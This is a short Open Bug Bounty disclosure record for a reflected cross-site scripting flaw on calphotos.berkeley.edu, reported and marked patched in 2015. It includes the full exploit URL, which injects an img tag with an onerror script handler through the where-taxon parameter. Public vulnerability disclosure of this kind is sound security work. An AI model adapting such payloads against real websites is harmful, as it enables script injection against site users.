calphotos.berkeley.edu XSS vulnerability

2015-08-21T09:26:00
ID OBB:80888
Type openbugbounty
Reporter bugs3ra
Modified 2015-08-21T09:29:00

Description

Vulnerable URL:
http://calphotos.berkeley.edu/cgi/img_query?max=50&query_src=aw_search_searchphotos&where-taxon=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSSPOSED%2F%29%3E&rel-taxon=like&where-cname=&rel-cname=like&where-lifeform=Amphibian&where-photographer=any&rel-location=like&where-location=&where-continent=&where-country=none&where-state=&rel-kwid=equals&where-kwid=
Details:

Description| Value
---|---
Patched:| Yes, at 31.08.2015
Latest check for patch:| 31.08.2015 18:42 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 6
VIP website status:| No
Check calphotos.berkeley.edu SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 21 August, 2015 09:26 GMT
Vulnerability existence verified and confirmed| 21 August, 2015 09:29 GMT